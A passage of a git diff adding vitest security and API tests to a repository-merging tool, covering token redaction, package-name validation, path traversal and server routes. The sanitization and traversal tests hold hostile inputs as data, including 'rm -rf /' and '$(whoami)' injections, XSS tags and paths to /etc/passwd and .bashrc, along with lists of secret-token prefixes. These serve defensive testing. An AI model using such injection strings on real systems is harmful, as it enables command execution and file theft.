expect(redactTokens(`//registry.npmjs.org/:_authToken=${token}`)).toBe( + '//registry.npmjs.org/:_authToken=***' + ); + }); + + it('should not redact text that merely starts with a token prefix', () => { + // Short strings below minimum length should not match + expect(redactTokens('ghp_short')).toBe('ghp_short'); + expect(redactTokens('glpat-short')).toBe('glpat-short'); + expect(redactTokens('npm_short')).toBe('npm_short'); + }); + + it('should redact multiple tokens in one 
string', () => { + const ghp = 'ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm'; + const npm = 'npm_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm'; + expect(redactTokens(`GH=${ghp} NPM=${npm}`)).toBe('GH=*** NPM=***'); + }); + + it('should not modify strings without tokens', () => { + expect(redactTokens('normal log message')).toBe('normal log message'); + expect(redactTokens('')).toBe(''); + }); +}); + +describe('redact – combined URL + token redaction', () => { + it('should redact both URL credentials and inline tokens', () => { + const ghp = 'ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm'; + const input = `cloning https://${ghp}@github.com/org/repo (token: ${ghp})`; + const result = redact(input); + expect(result).not.toContain(ghp); + expect(result).toContain('***@github.com/org/repo'); + expect(result).toContain('token: ***'); + }); + + it('should handle error messages with embedded credentials', () => { + const errorMsg = 'fatal: Authentication failed for https://user:password123@github.com/org/repo.git'; + const result = redact(errorMsg); + expect(result).not.toContain('password123'); + expect(result).not.toContain('user:password123'); + expect(result).toContain('***@github.com'); + }); + + it('should handle git clone failure messages', () => { + const glpat = 'glpat-ABCDEFGHIJKLMNOPQRSTUV'; + const errorMsg = `Cloning into '/tmp/repo'...\nfatal: could not read Username for 'https://gitlab.com': ${glpat}`; + const result = redact(errorMsg); + expect(result).not.toContain(glpat); + }); +}); + +describe('credential leak prevention – plan serialization', () => { + it('should not include auth tokens in plan JSON', () => { + // Simulate a plan object — verify it has no credential fields + const plan = { + version: 1, + sources: [ + { name: 'repo-a', path: '/tmp/work/repo-a' }, + { name: 'repo-b', path: '/tmp/work/repo-b' }, + ], + packagesDir: 'packages', + rootPackageJson: { + name: 'monorepo', + private: true, + devDependencies: { typescript: '^5.0.0' }, + }, + files: [ + 
{ relativePath: 'pnpm-workspace.yaml', content: 'packages:\n - packages/*\n' }, + ], + install: false, + }; + + const serialized = JSON.stringify(plan); + + // Common credential field names + for (const field of ['token', 'password', 'secret', 'credential', 'auth', 'apiKey']) { + expect(serialized.toLowerCase()).not.toContain(field); + } + + // Common token prefixes + for (const prefix of ['ghp_', 'gho_', 'ghu_', 'ghs_', 'ghr_', 'glpat-', 'npm_']) { + expect(serialized).not.toContain(prefix); + } + }); + + it('should use local paths, never remote URLs with credentials', () => { + const sources = [ + { name: 'repo', path: '/tmp/monotize-work/repo' }, + ]; + + for (const source of sources) { + expect(source.path).not.toMatch(/^https?:\/\//); + expect(source.path).not.toContain('@'); + expect(source.path).not.toMatch(/ghp_|gho_|ghu_|ghs_|ghr_|glpat-|npm_/); + } + }); +}); diff --git a/tests/unit/security/input-sanitization.test.ts b/tests/unit/security/input-sanitization.test.ts new file mode 100644 index 0000000..770cee9 --- /dev/null +++ b/tests/unit/security/input-sanitization.test.ts @@ -0,0 +1,172 @@ +import path from 'node:path'; +import { describe, it, expect } from 'vitest'; +import { + isValidPackageName, + sanitizePackageName, + parseRepoSource, +} from '../../../src/utils/validation.js'; + +/** + * Input sanitization security tests. + * + * These verify that user-provided inputs (package names, repo paths, + * URLs) are properly validated and sanitized before use. 
+ */ + +describe('isValidPackageName – malicious input rejection', () => { + it('should reject names with path traversal sequences', () => { + expect(isValidPackageName('../evil')).toBe(false); + expect(isValidPackageName('../../etc/passwd')).toBe(false); + expect(isValidPackageName('packages/../../../tmp')).toBe(false); + }); + + it('should reject names with shell metacharacters', () => { + expect(isValidPackageName('pkg; rm -rf /')).toBe(false); + expect(isValidPackageName('pkg$(whoami)')).toBe(false); + expect(isValidPackageName('pkg`id`')).toBe(false); + expect(isValidPackageName('pkg | cat /etc/passwd')).toBe(false); + }); + + it('should reject names with HTML/XSS payloads', () => { + expect(isValidPackageName('<script>alert(1)</script>')).toBe(false); + expect(isValidPackageName('pkg"><script>alert(1)</script>')).toBe(false); + }); + + it('should reject names with null bytes', () => { + expect(isValidPackageName('pkg\x00evil')).toBe(false); + }); + + it('should reject names exceeding 214 characters', () => { + const longName = 'a'.repeat(215); + expect(isValidPackageName(longName)).toBe(false); + }); + + it('should reject names with uppercase', () => { + expect(isValidPackageName('MyPackage')).toBe(false); + expect(isValidPackageName('ALLCAPS')).toBe(false); + }); + + it('should accept valid scoped package names', () => { + expect(isValidPackageName('@scope/pkg')).toBe(true); + expect(isValidPackageName('@my-org/my-pkg')).toBe(true); + }); + + it('should accept valid simple package names', () => { + expect(isValidPackageName('my-package')).toBe(true); + expect(isValidPackageName('pkg123')).toBe(true); + expect(isValidPackageName('my.pkg')).toBe(true); + }); +}); + +describe('sanitizePackageName – produces safe output', () => { + it('should lowercase all characters', () => { + expect(sanitizePackageName('MyPackage')).toBe('mypackage'); + expect(sanitizePackageName('UPPER')).toBe('upper'); + }); + + it('should replace invalid characters with dashes', () => { + expect(sanitizePackageName('pkg 
name')).toBe('pkg-name'); + expect(sanitizePackageName('pkg@evil')).toBe('pkg-evil'); + expect(sanitizePackageName('pkg;rm')).toBe('pkg-rm'); + }); + + it('should strip leading/trailing dots and dashes', () => { + expect(sanitizePackageName('.evil')).toBe('evil'); + expect(sanitizePackageName('-evil')).toBe('evil'); + expect(sanitizePackageName('...hidden')).toBe('hidden'); + }); + + it('should truncate to 214 characters', () => { + const longInput = 'a'.repeat(300); + expect(sanitizePackageName(longInput).length).toBeLessThanOrEqual(214); + }); + + it('should neutralize path traversal in names', () => { + const result = sanitizePackageName('../../../etc/passwd'); + expect(result).not.toContain('..'); + expect(result).not.toContain('/'); + }); + + it('should neutralize shell metacharacters in names', () => { + const result = sanitizePackageName('pkg;rm -rf /'); + expect(result).not.toContain(';'); + expect(result).not.toContain(' '); + }); + + it('should handle empty string', () => { + const result = sanitizePackageName(''); + expect(result).toBe(''); + }); +}); + +describe('parseRepoSource – safe source parsing', () => { + it('should classify local paths correctly', () => { + const localInput = '/tmp/my-repo'; + const source = parseRepoSource(localInput); + expect(source.type).toBe('local'); + expect(source.resolved).toBe(path.resolve(localInput)); + }); + + it('should classify relative paths as local', () => { + const source = parseRepoSource('./my-repo'); + expect(source.type).toBe('local'); + }); + + it('should classify parent-relative paths as local', () => { + const source = parseRepoSource('../my-repo'); + expect(source.type).toBe('local'); + }); + + it('should classify GitHub shorthands correctly', () => { + const source = parseRepoSource('owner/repo'); + expect(source.type).toBe('github'); + expect(source.resolved).toBe('https://github.com/owner/repo.git'); + }); + + it('should classify GitLab shorthands correctly', () => { + const source = 
parseRepoSource('gitlab:owner/repo'); + expect(source.type).toBe('gitlab'); + expect(source.resolved).toBe('https://gitlab.com/owner/repo.git'); + }); + + it('should extract repo name from HTTPS URLs', () => { + const source = parseRepoSource('https://github.com/org/my-repo.git'); + expect(source.name).toBe('my-repo'); + }); + + it('should extract repo name from SSH URLs', () => { + const source = parseRepoSource('git@github.com:org/my-repo.git'); + expect(source.name).toBe('my-repo'); + }); + + it('should trim whitespace from input', () => { + const source = parseRepoSource(' /tmp/my-repo '); + expect(source.original).toBe('/tmp/my-repo'); + }); + + it('should handle input with special characters in path', () => { + const source = parseRepoSource('/tmp/my repo with spaces'); + expect(source.type).toBe('local'); + expect(source.name).toBe('my repo with spaces'); + }); + + it('should produce "unknown" for empty-ish input', () => { + const source = parseRepoSource(''); + expect(source.name).toBe('unknown'); + }); +}); + +describe('URL handling – no credential inclusion', () => { + it('should not embed credentials in resolved GitHub URLs', () => { + const source = parseRepoSource('owner/repo'); + expect(source.resolved).not.toContain('@'); + expect(source.resolved).not.toContain('token'); + expect(source.resolved).toBe('https://github.com/owner/repo.git'); + }); + + it('should not embed credentials in resolved GitLab URLs', () => { + const source = parseRepoSource('gitlab:owner/repo'); + expect(source.resolved).not.toMatch(/\/\/[^/]*@/); + expect(source.resolved).toBe('https://gitlab.com/owner/repo.git'); + }); +}); diff --git a/tests/unit/security/path-traversal.test.ts b/tests/unit/security/path-traversal.test.ts new file mode 100644 index 0000000..e075048 --- /dev/null +++ b/tests/unit/security/path-traversal.test.ts @@ -0,0 +1,203 @@ +import { describe, it, expect } from 'vitest'; +import path from 'node:path'; +import { validatePlan } from 
'../../../src/commands/apply.js'; + +/** + * Path traversal security tests. + * + * These verify that the application rejects attempts to escape + * the output directory via ".." sequences, absolute paths, or + * encoded variants in both plan validation and runtime assertions. + */ + +// Re-implement assertPathContained locally so we can test it directly. +// (The real one is a private function in apply.ts — we test it +// indirectly via validatePlan and directly via this equivalent.) +function assertPathContained(base: string, relativePath: string): void { + const resolved = path.resolve(base, relativePath); + const normalizedBase = path.resolve(base) + path.sep; + if (!resolved.startsWith(normalizedBase) && resolved !== path.resolve(base)) { + throw new Error(`Path traversal detected: "${relativePath}" escapes base directory`); + } +} + +describe('assertPathContained – path traversal prevention', () => { + const base = '/tmp/monorepo-output'; + + it('should allow normal relative paths', () => { + expect(() => assertPathContained(base, 'packages/my-pkg')).not.toThrow(); + expect(() => assertPathContained(base, 'package.json')).not.toThrow(); + expect(() => assertPathContained(base, 'pnpm-workspace.yaml')).not.toThrow(); + expect(() => assertPathContained(base, '.gitignore')).not.toThrow(); + }); + + it('should reject simple "../" traversal', () => { + expect(() => assertPathContained(base, '../etc/passwd')).toThrow('Path traversal detected'); + }); + + it('should reject nested "../" traversal', () => { + expect(() => assertPathContained(base, '../../etc/shadow')).toThrow('Path traversal detected'); + }); + + it('should reject traversal hidden in a deeper path', () => { + expect(() => assertPathContained(base, 'packages/../../etc/passwd')).toThrow('Path traversal detected'); + }); + + it('should reject traversal that goes up and back down', () => { + // Goes up to /tmp then into "other" — outside our base + expect(() => assertPathContained(base, 
'../other/evil')).toThrow('Path traversal detected'); + }); + + it('should reject absolute paths', () => { + expect(() => assertPathContained(base, '/etc/passwd')).toThrow('Path traversal detected'); + }); + + it('should allow paths with ".." that resolve inside base', () => { + // packages/a/../b resolves to packages/b which is still inside base + expect(() => assertPathContained(base, 'packages/a/../b')).not.toThrow(); + }); +}); + +describe('validatePlan – rejects path traversal in packagesDir', () => { + function makePlan(overrides: Record<string, unknown> = {}) { + return { + version: 1, + sources: [{ name: 'pkg', path: '/tmp/src/pkg' }], + packagesDir: 'packages', + rootPackageJson: { name: 'mono', private: true }, + files: [], + install: false, + ...overrides, + }; + } + + it('should accept normal packagesDir', () => { + expect(validatePlan(makePlan({ packagesDir: 'packages' }))).toBe(true); + expect(validatePlan(makePlan({ packagesDir: 'libs' }))).toBe(true); + expect(validatePlan(makePlan({ packagesDir: 'apps' }))).toBe(true); + }); + + it('should reject packagesDir with ".."', () => { + expect(validatePlan(makePlan({ packagesDir: '../outside' }))).toBe(false); + expect(validatePlan(makePlan({ packagesDir: 'packages/../../etc' }))).toBe(false); + }); + + it('should reject absolute packagesDir', () => { + expect(validatePlan(makePlan({ packagesDir: '/etc' }))).toBe(false); + expect(validatePlan(makePlan({ packagesDir: '/tmp/evil' }))).toBe(false); + }); +}); + +describe('validatePlan – rejects path traversal in file relativePaths', () => { + function makePlanWithFile(relativePath: string) { + return { + version: 1, + sources: [{ name: 'pkg', path: '/tmp/src/pkg' }], + packagesDir: 'packages', + rootPackageJson: { name: 'mono', private: true }, + files: [{ relativePath, content: 'evil' }], + install: false, + }; + } + + it('should accept normal file paths', () => { + expect(validatePlan(makePlanWithFile('pnpm-workspace.yaml'))).toBe(true); + 
expect(validatePlan(makePlanWithFile('.gitignore'))).toBe(true); + expect(validatePlan(makePlanWithFile('README.md'))).toBe(true); + expect(validatePlan(makePlanWithFile('.github/workflows/ci.yml'))).toBe(true); + }); + + it('should reject file paths with ".."', () => { + expect(validatePlan(makePlanWithFile('../.bashrc'))).toBe(false); + expect(validatePlan(makePlanWithFile('../../etc/passwd'))).toBe(false); + expect(validatePlan(makePlanWithFile('packages/../../evil.js'))).toBe(false); + }); + + it('should reject absolute file paths', () => { + expect(validatePlan(makePlanWithFile('/etc/passwd'))).toBe(false); + expect(validatePlan(makePlanWithFile('/tmp/evil'))).toBe(false); + }); + + it('should reject file paths among valid ones', () => { + const plan = { + version: 1, + sources: [{ name: 'pkg', path: '/tmp/src/pkg' }], + packagesDir: 'packages', + rootPackageJson: { name: 'mono', private: true }, + files: [ + { relativePath: 'pnpm-workspace.yaml', content: 'ok' }, + { relativePath: '../.bashrc', content: 'evil' }, + ], + install: false, + }; + expect(validatePlan(plan)).toBe(false); + }); +}); + +describe('validatePlan – rejects malformed plans', () => { + it('should reject null', () => { + expect(validatePlan(null)).toBe(false); + }); + + it('should reject non-object', () => { + expect(validatePlan('string')).toBe(false); + expect(validatePlan(42)).toBe(false); + expect(validatePlan(true)).toBe(false); + }); + + it('should reject wrong version', () => { + expect(validatePlan({ version: 2 })).toBe(false); + expect(validatePlan({ version: 0 })).toBe(false); + }); + + it('should reject empty sources', () => { + expect(validatePlan({ + version: 1, + sources: [], + packagesDir: 'packages', + rootPackageJson: {}, + files: [], + install: false, + })).toBe(false); + }); + + it('should reject sources with missing name or path', () => { + expect(validatePlan({ + version: 1, + sources: [{ name: 'pkg' }], // missing path + packagesDir: 'packages', + rootPackageJson: {}, 
+ files: [], + install: false, + })).toBe(false); + + expect(validatePlan({ + version: 1, + sources: [{ path: '/tmp/pkg' }], // missing name + packagesDir: 'packages', + rootPackageJson: {}, + files: [], + install: false, + })).toBe(false); + }); + + it('should reject files with missing relativePath or content', () => { + expect(validatePlan({ + version: 1, + sources: [{ name: 'pkg', path: '/tmp/pkg' }], + packagesDir: 'packages', + rootPackageJson: {}, + files: [{ content: 'ok' }], // missing relativePath + install: false, + })).toBe(false); + + expect(validatePlan({ + version: 1, + sources: [{ name: 'pkg', path: '/tmp/pkg' }], + packagesDir: 'packages', + rootPackageJson: {}, + files: [{ relativePath: 'README.md' }], // missing content + install: false, + })).toBe(false); + }); +}); diff --git a/tests/unit/server/api.test.ts b/tests/unit/server/api.test.ts index b76b540..835f86d 100755 --- a/tests/unit/server/api.test.ts +++ b/tests/unit/server/api.test.ts @@ -1,7 +1,9 @@ import { describe, it, expect, afterEach } from 'vitest'; import path from 'node:path'; import fs from 'fs-extra'; -import { runAnalyze, runPlan, runVerify } from '../../../src/server/api.js'; +import os from 'node:os'; +import crypto from 'node:crypto'; +import { runAnalyze, runPlan, runVerify, runApply } from '../../../src/server/api.js'; import type { Logger } from '../../../src/types/index.js'; const fixturesDir = path.resolve(__dirname, '../../fixtures'); @@ -79,6 +81,47 @@ describe('runPlan', () => { }, 30000); }); +describe('runPlan - workspace tool', () => { + it('generates plan with turbo workspace tool', async () => { + const logger = createTestLogger(); + const repoA = path.join(fixturesDir, 'repo-a'); + const repoB = path.join(fixturesDir, 'repo-b'); + + const result = await runPlan( + [repoA, repoB], + { workspaceTool: 'turbo' }, + logger, + ); + createdFiles.push(result.planPath); + + expect(result.plan.rootPackageJson.devDependencies).toBeDefined(); + const devDeps = 
result.plan.rootPackageJson.devDependencies as Record<string, string>; + expect(devDeps.turbo).toBeDefined(); + + // Should have turbo.json file in plan + const turboFile = result.plan.files.find((f) => f.relativePath === 'turbo.json'); + expect(turboFile).toBeDefined(); + }, 30000); + + it('generates plan with workflow skip strategy', async () => { + const logger = createTestLogger(); + const repoA = path.join(fixturesDir, 'repo-a'); + + const result = await runPlan( + [repoA], + { workflowStrategy: 'skip' }, + logger, + ); + createdFiles.push(result.planPath); + + // With skip, no workflow files should be generated + const workflowFiles = result.plan.files.filter((f) => + f.relativePath.includes('.github/workflows'), + ); + expect(workflowFiles).toHaveLength(0); + }, 30000); +}); + describe('runVerify', () => { it('returns VerifyResult for plan file', async () => { const logger = createTestLogger(); @@ -113,4 +156,177 @@ 'Specify either plan or dir, not both', ); }); + + it('throws for non-existent plan file', async () => { + const logger = createTestLogger(); + await expect( + runVerify({ plan: '/nonexistent/plan.json' }, logger), + ).rejects.toThrow('Plan file not found'); + }); + + it('throws for invalid plan file content', async () => { + const tempDir = path.join(os.tmpdir(), `verify-api-${crypto.randomBytes(4).toString('hex')}`); + await fs.ensureDir(tempDir); + const planPath = path.join(tempDir, 'bad-plan.json'); + await fs.writeJson(planPath, { not: 'a valid plan' }); + + const logger = createTestLogger(); + try { + await expect( + runVerify({ plan: planPath }, logger), + ).rejects.toThrow('Invalid plan file'); + } finally { + await fs.remove(tempDir); + } + }); + + it('throws for non-existent dir', async () => { + const logger = createTestLogger(); + await expect( + runVerify({ dir: '/nonexistent/monorepo' }, logger), + ).rejects.toThrow('Directory not found'); + }); + + it('throws for dir without package.json', async () => { + const 
tempDir = path.join(os.tmpdir(), `verify-api-${crypto.randomBytes(4).toString('hex')}`); + await fs.ensureDir(tempDir); + + const logger = createTestLogger(); + try { + await expect( + runVerify({ dir: tempDir }, logger), + ).rejects.toThrow('No package.json found'); + } finally { + await fs.remove(tempDir); + } + }); + + it('runs static tier on a valid directory', async () => { + const tempDir = path.join(os.tmpdir(), `verify-api-${crypto.randomBytes(4).toString('hex')}`); + await fs.ensureDir(tempDir); + await fs.writeJson(path.join(tempDir, 'package.json'), { + name: 'test-monorepo', + version: '1.0.0', + workspaces: ['packages/*'], + }); + + const logger = createTestLogger(); + try { + const result = await runVerify({ dir: tempDir, tier: 'static' }, logger); + expect(result.tier).toBe('static'); + expect(result.inputType).toBe('dir'); + expect(result.checks.length).toBeGreaterThan(0); + } finally { + await fs.remove(tempDir); + } + }); + + it('runs install tier on a valid directory', async () => { + const tempDir = path.join(os.tmpdir(), `verify-api-${crypto.randomBytes(4).toString('hex')}`); + await fs.ensureDir(tempDir); + await fs.writeJson(path.join(tempDir, 'package.json'), { + name: 'test-monorepo', + version: '1.0.0', + workspaces: ['packages/*'], + }); + + const logger = createTestLogger(); + try { + const result = await runVerify({ dir: tempDir, tier: 'install' }, logger); + expect(result.tier).toBe('install'); + // Install tier includes static + install checks + expect(result.checks.length).toBeGreaterThan(0); + } finally { + await fs.remove(tempDir); + } + }, 30000); + + it('runs full tier on a valid directory', async () => { + const tempDir = path.join(os.tmpdir(), `verify-api-${crypto.randomBytes(4).toString('hex')}`); + await fs.ensureDir(tempDir); + await fs.writeJson(path.join(tempDir, 'package.json'), { + name: 'test-monorepo', + version: '1.0.0', + workspaces: ['packages/*'], + }); + + const logger = createTestLogger(); + try { + const result 
= await runVerify({ dir: tempDir, tier: 'full' }, logger); + expect(result.tier).toBe('full'); + // Full tier includes static + install + full checks + expect(result.checks.length).toBeGreaterThan(0); + } finally { + await fs.remove(tempDir); + } + }, 30000); +}); + +describe('runApply', () => { + it('throws for non-existent plan file', async () => { + const logger = createTestLogger(); + await expect( + runApply({ plan: '/nonexistent/plan.json' }, logger), + ).rejects.toThrow('Plan file not found'); + }); + + it('throws for invalid JSON plan file', async () => { + const tempDir = path.join(os.tmpdir(), `apply-api-${crypto.randomBytes(4).toString('hex')}`); + await fs.ensureDir(tempDir); + const planPath = path.join(tempDir, 'bad.plan.json'); + await fs.writeFile(planPath, 'not json at all{{{'); + + const logger = createTestLogger(); + try { + await expect( + runApply({ plan: planPath }, logger), + ).rejects.toThrow('Plan file contains invalid JSON'); + } finally { + await fs.remove(tempDir); + } + }); + + it('throws for structurally invalid plan', async () => { + const tempDir = path.join(os.tmpdir(), `apply-api-${crypto.randomBytes(4).toString('hex')}`); + await fs.ensureDir(tempDir); + const planPath = path.join(tempDir, 'invalid.plan.json'); + await fs.writeJson(planPath, { version: 1, sources: 'not an array' }); + + const logger = createTestLogger(); + try { + await expect( + runApply({ plan: planPath }, logger), + ).rejects.toThrow('Plan file is invalid'); + } finally { + await fs.remove(tempDir); + } + }); + + it('throws when source path does not exist', async () => { + const tempDir = path.join(os.tmpdir(), `apply-api-${crypto.randomBytes(4).toString('hex')}`); + await fs.ensureDir(tempDir); + const planPath = path.join(tempDir, 'test.plan.json'); + await fs.writeJson(planPath, { + version: 1, + sources: [{ name: 'missing-pkg', path: '/nonexistent/source/path' }], + packagesDir: 'packages', + rootPackageJson: { name: 'test', version: '1.0.0' }, + files: [], 
+ install: false, + installCommand: 'pnpm install', + }); + + const logger = createTestLogger(); + try { + await expect( + runApply({ plan: planPath, out: path.join(tempDir, 'output') }, logger), + ).rejects.toThrow('Source path not found'); + } finally { + // Cleanup staging dirs too + const dirContents = await fs.readdir(tempDir); + for (const item of dirContents) { + await fs.remove(path.join(tempDir, item)).catch(() => {}); + } + } + }); +}); diff --git a/tests/unit/server/routes.test.ts b/tests/unit/server/routes.test.ts new file mode 100644 index 0000000..46a1677 --- /dev/null +++ b/tests/unit/server/routes.test.ts @@ -0,0 +1,139 @@ +import { describe, it, expect, beforeAll, afterAll } from 'vitest'; +import http from 'node:http'; +import request from 'supertest'; +import { createServer } from '../../../src/server/index.js'; + +describe('server routes - add and migrate-branch', () => { + let server: http.Server; + let authToken: string; + + function authPost(path: string) { + return request(server).post(path).set('Authorization', `Bearer ${authToken}`); + } + + beforeAll(async () => { + const result = createServer({ port: 0 }); + server = result.server; + authToken = result.token; + await new Promise<void>((resolve) => { + server.on('listening', resolve); + }); + }); + + afterAll(async () => { + await new Promise<void>((resolve) => { + server.close(() => resolve()); + }); + }); + + describe('POST /api/add', () => { + it('should return 400 when repo is missing', async () => { + const res = await authPost('/api/add').send({}); + expect(res.status).toBe(400); + expect(res.body.error).toContain('repo'); + }); + + it('should return 400 when repo is not a string', async () => { + const res = await authPost('/api/add').send({ repo: 123 }); + expect(res.status).toBe(400); + expect(res.body.error).toContain('repo'); + }); + + it('should return 400 when targetMonorepo is missing', async () => { + const res = await authPost('/api/add').send({ repo: 'org/my-lib' }); + 
expect(res.status).toBe(400); + expect(res.body.error).toContain('targetMonorepo'); + }); + + it('should return 400 when targetMonorepo is not a string', async () => { + const res = await authPost('/api/add').send({ repo: 'org/my-lib', targetMonorepo: 42 }); + expect(res.status).toBe(400); + expect(res.body.error).toContain('targetMonorepo'); + }); + + it('should return 202 with opId for valid request', async () => { + const res = await authPost('/api/add').send({ + repo: 'tests/fixtures/repo-a', + targetMonorepo: '/tmp/nonexistent-mono', + }); + expect(res.status).toBe(202); + expect(res.body.opId).toBeDefined(); + expect(typeof res.body.opId).toBe('string'); + }); + }); + + describe('POST /api/migrate-branch', () => { + it('should return 400 when branch is missing', async () => { + const res = await authPost('/api/migrate-branch').send({}); + expect(res.status).toBe(400); + expect(res.body.error).toContain('branch'); + }); + + it('should return 400 when branch is not a string', async () => { + const res = await authPost('/api/migrate-branch').send({ branch: 123 }); + expect(res.status).toBe(400); + expect(res.body.error).toContain('branch'); + }); + + it('should return 400 when sourceRepo is missing', async () => { + const res = await authPost('/api/migrate-branch').send({ branch: 'main' }); + expect(res.status).toBe(400); + expect(res.body.error).toContain('sourceRepo'); + }); + + it('should return 400 when sourceRepo is not a string', async () => { + const res = await authPost('/api/migrate-branch').send({ branch: 'main', sourceRepo: 42 }); + expect(res.status).toBe(400); + expect(res.body.error).toContain('sourceRepo'); + }); + + it('should return 400 when targetMonorepo is missing', async () => { + const res = await authPost('/api/migrate-branch').send({ + branch: 'main', + sourceRepo: '/tmp/src', + }); + expect(res.status).toBe(400); + expect(res.body.error).toContain('targetMonorepo'); + }); + + it('should return 400 when targetMonorepo is not a string', 
async () => { + const res = await authPost('/api/migrate-branch').send({ + branch: 'main', + sourceRepo: '/tmp/src', + targetMonorepo: false, + }); + expect(res.status).toBe(400); + expect(res.body.error).toContain('targetMonorepo'); + }); + + it('should return 202 with opId for valid request', async () => { + const res = await authPost('/api/migrate-branch').send({ + branch: 'main', + sourceRepo: '/tmp/src', + targetMonorepo: '/tmp/target', + }); + expect(res.status).toBe(202); + expect(res.body.opId).toBeDefined(); + expect(typeof res.body.opId).toBe('string'); + }); + + it('should default to subtree strategy', async () => { + const res = await authPost('/api/migrate-branch').send({ + branch: 'main', + sourceRepo: '/tmp/src', + targetMonorepo: '/tmp/target', + }); + expect(res.status).toBe(202); + }); + + it('should accept replay strategy', async () => { + const res = await authPost('/api/migrate-branch').send({ + branch: 'feature', + sourceRepo: '/tmp/src', + targetMonorepo: '/tmp/target', + strategy: 'replay', + }); + expect(res.status).toBe(202); + }); + }); +}); diff --git a/tests/unit/server/wizard-routes-errors.test.ts b/tests/unit/server/wizard-routes-errors.test.ts new file mode 100644 index 0000000..f49b51c --- /dev/null +++ b/tests/unit/server/wizard-routes-errors.test.ts @@ -0,0 +1,126 @@ +import { describe, it, expect, vi, beforeAll, afterAll } from 'vitest'; +import express from 'express'; +import http from 'node:http'; +import request from 'supertest'; + +vi.mock('../../../src/server/wizard-state.js', () => ({ + readWizardState: vi.fn(), + writeWizardState: vi.fn(), + createDefaultWizardState: vi.fn(), +})); + +import { wizardRoute } from '../../../src/server/routes/wizard.js'; +import { + readWizardState, + writeWizardState, + createDefaultWizardState, +} from '../../../src/server/wizard-state.js'; + +const mockRead = vi.mocked(readWizardState); +const mockWrite = vi.mocked(writeWizardState); +const mockCreate = vi.mocked(createDefaultWizardState); 
+
+describe('wizard routes error handling', () => {
+  let app: express.Express;
+  let server: http.Server;
+
+  beforeAll(async () => {
+    app = express();
+    app.use(express.json());
+    app.use('/api/wizard', wizardRoute());
+    server = http.createServer(app);
+    await new Promise<void>((resolve) => {
+      server.listen(0, '127.0.0.1', resolve);
+    });
+  });
+
+  afterAll(async () => {
+    await new Promise<void>((resolve) => {
+      server.close(() => resolve());
+    });
+  });
+
+  describe('GET /api/wizard/state error path', () => {
+    it('should return 500 when readWizardState throws an Error', async () => {
+      mockRead.mockRejectedValueOnce(new Error('disk read failure'));
+
+      const res = await request(server).get('/api/wizard/state');
+
+      expect(res.status).toBe(500);
+      expect(res.body.error).toBe('disk read failure');
+    });
+
+    it('should return 500 with fallback message for non-Error throw', async () => {
+      mockRead.mockRejectedValueOnce('string error');
+
+      const res = await request(server).get('/api/wizard/state');
+
+      expect(res.status).toBe(500);
+      expect(res.body.error).toBe('Failed to read wizard state');
+    });
+  });
+
+  describe('PUT /api/wizard/state error path', () => {
+    it('should return 500 when writeWizardState throws an Error', async () => {
+      mockWrite.mockRejectedValueOnce(new Error('disk write failure'));
+
+      const res = await request(server)
+        .put('/api/wizard/state')
+        .send({ version: 1, currentStep: 0 });
+
+      expect(res.status).toBe(500);
+      expect(res.body.error).toBe('disk write failure');
+    });
+
+    it('should return 500 with fallback message for non-Error throw', async () => {
+      mockWrite.mockRejectedValueOnce(42);
+
+      const res = await request(server)
+        .put('/api/wizard/state')
+        .send({ version: 1, currentStep: 0 });
+
+      expect(res.status).toBe(500);
+      expect(res.body.error).toBe('Failed to write wizard state');
+    });
+  });
+
+  describe('POST /api/wizard/init error path', () => {
+    it('should return 500 when createDefaultWizardState throws an Error', async () => {
+      mockCreate.mockImplementationOnce(() => {
+        throw new Error('creation failure');
+      });
+
+      const res = await request(server)
+        .post('/api/wizard/init')
+        .send({ repos: ['/tmp/test'] });
+
+      expect(res.status).toBe(500);
+      expect(res.body.error).toBe('creation failure');
+    });
+
+    it('should return 500 when writeWizardState rejects after init', async () => {
+      mockCreate.mockReturnValueOnce({ version: 1, currentStep: 'assess' } as ReturnType<typeof createDefaultWizardState>);
+      mockWrite.mockRejectedValueOnce(new Error('write after init failed'));
+
+      const res = await request(server)
+        .post('/api/wizard/init')
+        .send({ repos: ['/tmp/test'] });
+
+      expect(res.status).toBe(500);
+      expect(res.body.error).toBe('write after init failed');
+    });
+
+    it('should return 500 with fallback for non-Error throw in init', async () => {
+      mockCreate.mockImplementationOnce(() => {
+        throw 'unexpected';
+      });
+
+      const res = await request(server)
+        .post('/api/wizard/init')
+        .send({ repos: ['/tmp/test'] });
+
+      expect(res.status).toBe(500);
+      expect(res.body.error).toBe('Failed to initialize wizard state');
+    });
+  });
+});
diff --git a/tests/unit/server/wizard-routes.test.ts b/tests/unit/server/wizard-routes.test.ts
new file mode 100644
index 0000000..fa7d2a3
--- /dev/null
+++ b/tests/unit/server/wizard-routes.test.ts
@@ -0,0 +1,112 @@
+import { describe, it, expect, beforeAll, afterAll } from 'vitest';
+import http from 'node:http';
+import request from 'supertest';
+import { createServer } from '../../../src/server/index.js';
+
+describe('wizard routes', () => {
+  let server: http.Server;
+  let authToken: string;
+
+  beforeAll(async () => {
+    const result = createServer({ port: 0 });
+    server = result.server;
+    authToken = result.token;
+    await new Promise<void>((resolve) => {
+      server.on('listening', resolve);
+    });
+  });
+
+  afterAll(async () => {
+    await new Promise<void>((resolve) => {
+      server.close(() => resolve());
+    });
+  });
+
+  function authGet(urlPath: string) {
+    return
request(server).get(urlPath).set('Authorization', `Bearer ${authToken}`); + } + + function authPut(urlPath: string) { + return request(server).put(urlPath).set('Authorization', `Bearer ${authToken}`); + } + + function authPost(urlPath: string) { + return request(server).post(urlPath).set('Authorization', `Bearer ${authToken}`); + } + + describe('GET /api/wizard/state', () => { + it('should return state object with exists field', async () => { + const res = await authGet('/api/wizard/state'); + expect(res.status).toBe(200); + expect(res.body).toHaveProperty('exists'); + expect(typeof res.body.exists).toBe('boolean'); + }); + }); + + describe('PUT /api/wizard/state', () => { + it('should reject state without version', async () => { + const res = await authPut('/api/wizard/state').send({ step: 1 }); + expect(res.status).toBe(400); + expect(res.body.error).toContain('version'); + }); + + it('should reject non-object body', async () => { + const res = await authPut('/api/wizard/state').send('not-json'); + expect(res.status).toBe(400); + }); + + it('should accept valid wizard state', async () => { + const state = { + version: 1, + currentStep: 0, + repos: ['/tmp/repo-a'], + completedSteps: [], + }; + const res = await authPut('/api/wizard/state').send(state); + expect(res.status).toBe(200); + expect(res.body.ok).toBe(true); + }); + + it('should persist state that can be read back', async () => { + const state = { + version: 1, + currentStep: 